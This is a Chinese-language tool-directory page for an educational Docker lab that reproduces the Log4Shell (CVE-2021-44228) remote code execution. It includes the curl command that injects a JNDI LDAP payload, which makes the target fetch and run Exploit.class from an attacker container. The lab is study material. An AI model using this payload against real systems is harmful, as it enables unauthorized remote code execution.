Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44228_Log4Shell — 基于Docker的Log4Shell (CVE-2021-44228) RCE利用演示,包含易受攻击的Spring Boot应用、恶意LDAP服务器以及通过JNDI注入的payload投递。 | Kitploit
工具/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

基于Docker的Log4Shell (CVE-2021-44228) RCE利用演示,包含易受攻击的Spring Boot应用、恶意LDAP服务器以及通过JNDI注入的payload投递。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
24个月前尚未审核

演示 Log4Shell 漏洞利用 (CVE-2021-44228)

该项目模拟通过 Apache Log4j 2 库中的 Log4Shell 漏洞进行 RCE 攻击的场景。

组件

  1. vulnerable-app: 使用 Log4j 2.14.1 的 Spring Boot 应用程序。
  2. attacker: 包含恶意 LDAP 服务器 (marshalsec) 和用于提供恶意文件 Exploit.class 的 HTTP 服务器。

执行方法

1. 启动环境

需要已安装 Docker 和 Docker Compose。

root@kitploit:~
docker compose up --build

等待直到两个容器都就绪。vulnerable-app 将在 8080 端口上运行。

2. 执行攻击

打开一个新终端并通过 X-Api-Version 标头发送包含 JNDI payload 的请求:

root@kitploit:~
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. 检查结果

  • 检查 vulnerable-app 容器的日志。您将看到 payload 已被记录的提示。
  • 检查 attacker 容器的日志。您将看到 LDAP 连接被重定向到 HTTP 服务器。
  • 验证 RCE:检查 vulnerable-app 容器中是否已创建 /tmp/pwned 文件:
root@kitploit:~
docker exec -it vulnerable-app ls -la /tmp/pwned

如果文件存在,则证明恶意 Exploit.class 已成功执行!

警告

本项目仅用于教育和安全研究目的。严禁用于非法用途。

下载工具